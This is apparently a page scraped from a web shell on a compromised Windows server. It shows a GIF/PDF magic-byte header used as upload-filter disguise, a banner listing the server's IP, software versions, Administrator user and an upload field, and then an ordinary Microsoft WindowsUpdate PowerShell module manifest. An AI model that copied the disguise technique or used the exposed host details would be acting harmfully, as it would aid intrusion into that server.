GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Windows/SysWOW64/WindowsPowerShell/v1.0/Modules/WindowsUpdate/ |
Upload File : |
# # Module manifest for module 'WindowsUpdate' # @{ # Version number of this module. ModuleVersion = '1.0.0.0' # ID used to uniquely identify this module GUID = 'db6155f2-9e89-45cf-876a-f15141294f5b' # Author of this module Author = 'Microsoft Corporation' # Company or vendor of this module CompanyName = 'Microsoft Corporation' # Copyright statement for this module Copyright = '(c) Microsoft Corporation. All rights reserved.' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '5.1' # List of all modules packaged with this module ModuleList = @('.\WindowsUpdateLog.psm1') # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess NestedModules = @('.\WindowsUpdateLog.psm1') # Functions to export from this module FunctionsToExport = @('Get-WindowsUpdateLog') AliasesToExport = @() CmdletsToExport = @() # HelpInfo URI of this module HelpInfoURI = 'https://go.microsoft.com/fwlink/?LinkId=614995' CompatiblePSEditions = @('Desktop', 'Core') }